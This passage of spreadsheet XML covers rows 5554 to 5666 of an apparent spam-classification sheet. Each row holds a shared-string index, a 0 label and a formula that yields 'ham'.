        <v>0</v>
      </c>
      <c r="C5554" t="str">
        <f t="shared" si="86"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5555" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5555" t="s">
        <v>4865</v>
      </c>
      <c r="B5555">
        <v>0</v>
      </c>
      <c r="C5555" t="str">
        <f t="shared" si="86"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5556" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5556" t="s">
        <v>4866</v>
      </c>
      <c r="B5556">
        <v>0</v>
      </c>
      <c r="C5556" t="str">
        <f t="shared" si="86"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5557" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5557" t="s">
        <v>4867</v>
      </c>
      <c r="B5557">
        <v>0</v>
      </c>
      <c r="C5557" t="str">
        <f t="shared" si="86"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5558" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5558" t="s">
        <v>4868</v>
      </c>
      <c r="B5558">
        <v>0</v>
      </c>
      <c r="C5558" t="str">
        <f t="shared" si="86"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5559" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5559" t="s">
        <v>4869</v>
      </c>
      <c r="B5559">
        <v>0</v>
      </c>
      <c r="C5559" t="str">
        <f t="shared" si="86"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5560" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5560" t="s">
        <v>4870</v>
      </c>
      <c r="B5560">
        <v>0</v>
      </c>
      <c r="C5560" t="str">
        <f t="shared" si="86"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5561" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5561" t="s">
        <v>4871</v>
      </c>
      <c r="B5561">
        <v>0</v>
      </c>
      <c r="C5561" t="str">
        <f t="shared" si="86"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5562" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5562" t="s">
        <v>4872</v>
      </c>
      <c r="B5562">
        <v>0</v>
      </c>
      <c r="C5562" t="str">
        <f t="shared" si="86"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5563" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5563" t="s">
        <v>4873</v>
      </c>
      <c r="B5563">
        <v>0</v>
      </c>
      <c r="C5563" t="str">
        <f t="shared" si="86"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5564" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5564" t="s">
        <v>4874</v>
      </c>
      <c r="B5564">
        <v>0</v>
      </c>
      <c r="C5564" t="str">
        <f t="shared" si="86"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5565" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5565" t="s">
        <v>4875</v>
      </c>
      <c r="B5565">
        <v>0</v>
      </c>
      <c r="C5565" t="str">
        <f t="shared" si="86"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5566" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5566" t="s">
        <v>4876</v>
      </c>
      <c r="B5566">
        <v>0</v>
      </c>
      <c r="C5566" t="str">
        <f t="shared" si="86"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5567" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5567" t="s">
        <v>4877</v>
      </c>
      <c r="B5567">
        <v>0</v>
      </c>
      <c r="C5567" t="str">
        <f t="shared" si="86"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5568" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5568" t="s">
        <v>4878</v>
      </c>
      <c r="B5568">
        <v>0</v>
      </c>
      <c r="C5568" t="str">
        <f t="shared" si="86"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5569" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5569" t="s">
        <v>4879</v>
      </c>
      <c r="B5569">
        <v>0</v>
      </c>
      <c r="C5569" t="str">
        <f t="shared" si="86"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5570" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5570" t="s">
        <v>4880</v>
      </c>
      <c r="B5570">
        <v>0</v>
      </c>
      <c r="C5570" t="str">
        <f t="shared" ref="C5570:C5633" si="87">IF(B5570="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="5571" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5571" t="s">
        <v>4881</v>
      </c>
      <c r="B5571">
        <v>0</v>
      </c>
      <c r="C5571" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5572" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5572" t="s">
        <v>4882</v>
      </c>
      <c r="B5572">
        <v>0</v>
      </c>
      <c r="C5572" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5573" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5573" t="s">
        <v>4883</v>
      </c>
      <c r="B5573">
        <v>0</v>
      </c>
      <c r="C5573" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5574" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5574" t="s">
        <v>21</v>
      </c>
      <c r="B5574">
        <v>0</v>
      </c>
      <c r="C5574" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5575" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5575" t="s">
        <v>4884</v>
      </c>
      <c r="B5575">
        <v>0</v>
      </c>
      <c r="C5575" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5576" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5576" t="s">
        <v>4885</v>
      </c>
      <c r="B5576">
        <v>0</v>
      </c>
      <c r="C5576" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5577" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5577" t="s">
        <v>4886</v>
      </c>
      <c r="B5577">
        <v>0</v>
      </c>
      <c r="C5577" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5578" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5578" t="s">
        <v>4887</v>
      </c>
      <c r="B5578">
        <v>0</v>
      </c>
      <c r="C5578" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5579" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5579" t="s">
        <v>4888</v>
      </c>
      <c r="B5579">
        <v>0</v>
      </c>
      <c r="C5579" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5580" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5580" t="s">
        <v>4889</v>
      </c>
      <c r="B5580">
        <v>0</v>
      </c>
      <c r="C5580" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5581" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5581" t="s">
        <v>4890</v>
      </c>
      <c r="B5581">
        <v>0</v>
      </c>
      <c r="C5581" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5582" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5582" t="s">
        <v>4891</v>
      </c>
      <c r="B5582">
        <v>0</v>
      </c>
      <c r="C5582" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5583" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5583" t="s">
        <v>4892</v>
      </c>
      <c r="B5583">
        <v>0</v>
      </c>
      <c r="C5583" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5584" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5584" t="s">
        <v>21</v>
      </c>
      <c r="B5584">
        <v>0</v>
      </c>
      <c r="C5584" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5585" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5585" t="s">
        <v>4893</v>
      </c>
      <c r="B5585">
        <v>0</v>
      </c>
      <c r="C5585" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5586" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5586" t="s">
        <v>4894</v>
      </c>
      <c r="B5586">
        <v>0</v>
      </c>
      <c r="C5586" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5587" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5587" t="s">
        <v>4895</v>
      </c>
      <c r="B5587">
        <v>0</v>
      </c>
      <c r="C5587" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5588" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5588" t="s">
        <v>4896</v>
      </c>
      <c r="B5588">
        <v>0</v>
      </c>
      <c r="C5588" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5589" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5589" t="s">
        <v>4897</v>
      </c>
      <c r="B5589">
        <v>0</v>
      </c>
      <c r="C5589" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5590" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5590" t="s">
        <v>4898</v>
      </c>
      <c r="B5590">
        <v>0</v>
      </c>
      <c r="C5590" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5591" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5591" t="s">
        <v>4899</v>
      </c>
      <c r="B5591">
        <v>0</v>
      </c>
      <c r="C5591" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5592" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5592" t="s">
        <v>4900</v>
      </c>
      <c r="B5592">
        <v>0</v>
      </c>
      <c r="C5592" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5593" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5593" t="s">
        <v>4901</v>
      </c>
      <c r="B5593">
        <v>0</v>
      </c>
      <c r="C5593" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5594" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5594" t="s">
        <v>4902</v>
      </c>
      <c r="B5594">
        <v>0</v>
      </c>
      <c r="C5594" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5595" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5595" t="s">
        <v>4903</v>
      </c>
      <c r="B5595">
        <v>0</v>
      </c>
      <c r="C5595" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5596" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5596" t="s">
        <v>4904</v>
      </c>
      <c r="B5596">
        <v>0</v>
      </c>
      <c r="C5596" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5597" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5597" t="s">
        <v>4905</v>
      </c>
      <c r="B5597">
        <v>0</v>
      </c>
      <c r="C5597" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5598" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5598" t="s">
        <v>4906</v>
      </c>
      <c r="B5598">
        <v>0</v>
      </c>
      <c r="C5598" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5599" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5599" t="s">
        <v>4907</v>
      </c>
      <c r="B5599">
        <v>0</v>
      </c>
      <c r="C5599" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5600" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5600" t="s">
        <v>4908</v>
      </c>
      <c r="B5600">
        <v>0</v>
      </c>
      <c r="C5600" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5601" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5601" t="s">
        <v>4909</v>
      </c>
      <c r="B5601">
        <v>0</v>
      </c>
      <c r="C5601" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5602" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5602" t="s">
        <v>4910</v>
      </c>
      <c r="B5602">
        <v>0</v>
      </c>
      <c r="C5602" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5603" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5603" t="s">
        <v>4911</v>
      </c>
      <c r="B5603">
        <v>0</v>
      </c>
      <c r="C5603" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5604" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5604" t="s">
        <v>4912</v>
      </c>
      <c r="B5604">
        <v>0</v>
      </c>
      <c r="C5604" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5605" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5605" t="s">
        <v>4913</v>
      </c>
      <c r="B5605">
        <v>0</v>
      </c>
      <c r="C5605" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5606" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5606" t="s">
        <v>4914</v>
      </c>
      <c r="B5606">
        <v>0</v>
      </c>
      <c r="C5606" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5607" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5607" t="s">
        <v>4915</v>
      </c>
      <c r="B5607">
        <v>0</v>
      </c>
      <c r="C5607" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5608" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5608" t="s">
        <v>4916</v>
      </c>
      <c r="B5608">
        <v>0</v>
      </c>
      <c r="C5608" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5609" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5609" t="s">
        <v>4917</v>
      </c>
      <c r="B5609">
        <v>0</v>
      </c>
      <c r="C5609" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5610" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5610" t="s">
        <v>4918</v>
      </c>
      <c r="B5610">
        <v>0</v>
      </c>
      <c r="C5610" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5611" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5611" t="s">
        <v>4919</v>
      </c>
      <c r="B5611">
        <v>0</v>
      </c>
      <c r="C5611" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5612" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5612" t="s">
        <v>4920</v>
      </c>
      <c r="B5612">
        <v>0</v>
      </c>
      <c r="C5612" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5613" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5613" t="s">
        <v>4921</v>
      </c>
      <c r="B5613">
        <v>0</v>
      </c>
      <c r="C5613" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5614" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5614" t="s">
        <v>4922</v>
      </c>
      <c r="B5614">
        <v>0</v>
      </c>
      <c r="C5614" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5615" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5615" t="s">
        <v>4923</v>
      </c>
      <c r="B5615">
        <v>0</v>
      </c>
      <c r="C5615" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5616" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5616" t="s">
        <v>4924</v>
      </c>
      <c r="B5616">
        <v>0</v>
      </c>
      <c r="C5616" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5617" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5617" t="s">
        <v>4925</v>
      </c>
      <c r="B5617">
        <v>0</v>
      </c>
      <c r="C5617" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5618" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5618" t="s">
        <v>4926</v>
      </c>
      <c r="B5618">
        <v>0</v>
      </c>
      <c r="C5618" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5619" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5619" t="s">
        <v>4927</v>
      </c>
      <c r="B5619">
        <v>0</v>
      </c>
      <c r="C5619" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5620" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5620" t="s">
        <v>4928</v>
      </c>
      <c r="B5620">
        <v>0</v>
      </c>
      <c r="C5620" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5621" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5621" t="s">
        <v>4929</v>
      </c>
      <c r="B5621">
        <v>0</v>
      </c>
      <c r="C5621" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5622" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5622" t="s">
        <v>4930</v>
      </c>
      <c r="B5622">
        <v>0</v>
      </c>
      <c r="C5622" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5623" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5623" t="s">
        <v>4931</v>
      </c>
      <c r="B5623">
        <v>0</v>
      </c>
      <c r="C5623" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5624" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5624" t="s">
        <v>4932</v>
      </c>
      <c r="B5624">
        <v>0</v>
      </c>
      <c r="C5624" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5625" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5625" t="s">
        <v>4933</v>
      </c>
      <c r="B5625">
        <v>0</v>
      </c>
      <c r="C5625" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5626" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5626" t="s">
        <v>4934</v>
      </c>
      <c r="B5626">
        <v>0</v>
      </c>
      <c r="C5626" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5627" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5627" t="s">
        <v>4935</v>
      </c>
      <c r="B5627">
        <v>0</v>
      </c>
      <c r="C5627" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5628" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5628" t="s">
        <v>4936</v>
      </c>
      <c r="B5628">
        <v>0</v>
      </c>
      <c r="C5628" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5629" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5629" t="s">
        <v>4937</v>
      </c>
      <c r="B5629">
        <v>0</v>
      </c>
      <c r="C5629" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5630" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5630" t="s">
        <v>4938</v>
      </c>
      <c r="B5630">
        <v>0</v>
      </c>
      <c r="C5630" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5631" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5631" t="s">
        <v>4939</v>
      </c>
      <c r="B5631">
        <v>0</v>
      </c>
      <c r="C5631" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5632" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5632" t="s">
        <v>4940</v>
      </c>
      <c r="B5632">
        <v>0</v>
      </c>
      <c r="C5632" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5633" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5633" t="s">
        <v>4941</v>
      </c>
      <c r="B5633">
        <v>0</v>
      </c>
      <c r="C5633" t="str">
        <f t="shared" si="87"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5634" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5634" t="s">
        <v>4942</v>
      </c>
      <c r="B5634">
        <v>0</v>
      </c>
      <c r="C5634" t="str">
        <f t="shared" ref="C5634:C5697" si="88">IF(B5634="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="5635" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5635" t="s">
        <v>4943</v>
      </c>
      <c r="B5635">
        <v>0</v>
      </c>
      <c r="C5635" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5636" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5636" t="s">
        <v>4944</v>
      </c>
      <c r="B5636">
        <v>0</v>
      </c>
      <c r="C5636" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5637" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5637" t="s">
        <v>4945</v>
      </c>
      <c r="B5637">
        <v>0</v>
      </c>
      <c r="C5637" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5638" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5638" t="s">
        <v>4946</v>
      </c>
      <c r="B5638">
        <v>0</v>
      </c>
      <c r="C5638" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5639" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5639" t="s">
        <v>4947</v>
      </c>
      <c r="B5639">
        <v>0</v>
      </c>
      <c r="C5639" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5640" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5640" t="s">
        <v>4948</v>
      </c>
      <c r="B5640">
        <v>0</v>
      </c>
      <c r="C5640" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5641" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5641" t="s">
        <v>4949</v>
      </c>
      <c r="B5641">
        <v>0</v>
      </c>
      <c r="C5641" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5642" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5642" t="s">
        <v>4950</v>
      </c>
      <c r="B5642">
        <v>0</v>
      </c>
      <c r="C5642" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5643" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5643" t="s">
        <v>4951</v>
      </c>
      <c r="B5643">
        <v>0</v>
      </c>
      <c r="C5643" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5644" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5644" t="s">
        <v>4952</v>
      </c>
      <c r="B5644">
        <v>0</v>
      </c>
      <c r="C5644" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5645" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5645" t="s">
        <v>21</v>
      </c>
      <c r="B5645">
        <v>0</v>
      </c>
      <c r="C5645" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5646" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5646" t="s">
        <v>4953</v>
      </c>
      <c r="B5646">
        <v>0</v>
      </c>
      <c r="C5646" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5647" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5647" t="s">
        <v>4954</v>
      </c>
      <c r="B5647">
        <v>0</v>
      </c>
      <c r="C5647" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5648" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5648" t="s">
        <v>4955</v>
      </c>
      <c r="B5648">
        <v>0</v>
      </c>
      <c r="C5648" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5649" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5649" t="s">
        <v>4956</v>
      </c>
      <c r="B5649">
        <v>0</v>
      </c>
      <c r="C5649" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5650" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5650" t="s">
        <v>4957</v>
      </c>
      <c r="B5650">
        <v>0</v>
      </c>
      <c r="C5650" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5651" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5651" t="s">
        <v>4958</v>
      </c>
      <c r="B5651">
        <v>0</v>
      </c>
      <c r="C5651" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5652" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5652" t="s">
        <v>4959</v>
      </c>
      <c r="B5652">
        <v>0</v>
      </c>
      <c r="C5652" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5653" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5653" t="s">
        <v>4960</v>
      </c>
      <c r="B5653">
        <v>0</v>
      </c>
      <c r="C5653" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5654" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5654" t="s">
        <v>4961</v>
      </c>
      <c r="B5654">
        <v>0</v>
      </c>
      <c r="C5654" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5655" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5655" t="s">
        <v>4962</v>
      </c>
      <c r="B5655">
        <v>0</v>
      </c>
      <c r="C5655" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5656" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5656" t="s">
        <v>4963</v>
      </c>
      <c r="B5656">
        <v>0</v>
      </c>
      <c r="C5656" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5657" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5657" t="s">
        <v>4964</v>
      </c>
      <c r="B5657">
        <v>0</v>
      </c>
      <c r="C5657" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5658" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5658" t="s">
        <v>4965</v>
      </c>
      <c r="B5658">
        <v>0</v>
      </c>
      <c r="C5658" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5659" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5659" t="s">
        <v>4966</v>
      </c>
      <c r="B5659">
        <v>0</v>
      </c>
      <c r="C5659" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5660" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5660" t="s">
        <v>4967</v>
      </c>
      <c r="B5660">
        <v>0</v>
      </c>
      <c r="C5660" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5661" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5661" t="s">
        <v>4968</v>
      </c>
      <c r="B5661">
        <v>0</v>
      </c>
      <c r="C5661" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5662" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5662" t="s">
        <v>4969</v>
      </c>
      <c r="B5662">
        <v>0</v>
      </c>
      <c r="C5662" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5663" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5663" t="s">
        <v>4970</v>
      </c>
      <c r="B5663">
        <v>0</v>
      </c>
      <c r="C5663" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5664" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5664" t="s">
        <v>4971</v>
      </c>
      <c r="B5664">
        <v>0</v>
      </c>
      <c r="C5664" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5665" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5665" t="s">
        <v>4972</v>
      </c>
      <c r="B5665">
        <v>0</v>
      </c>
      <c r="C5665" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5666" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5666" t="s">
        <v>4973</v>
      </c>
      <c r="B5666">
        <v>0</v>
      </c>
      <c r="C5666" t="str">
        <f t="shared" si="88"/>
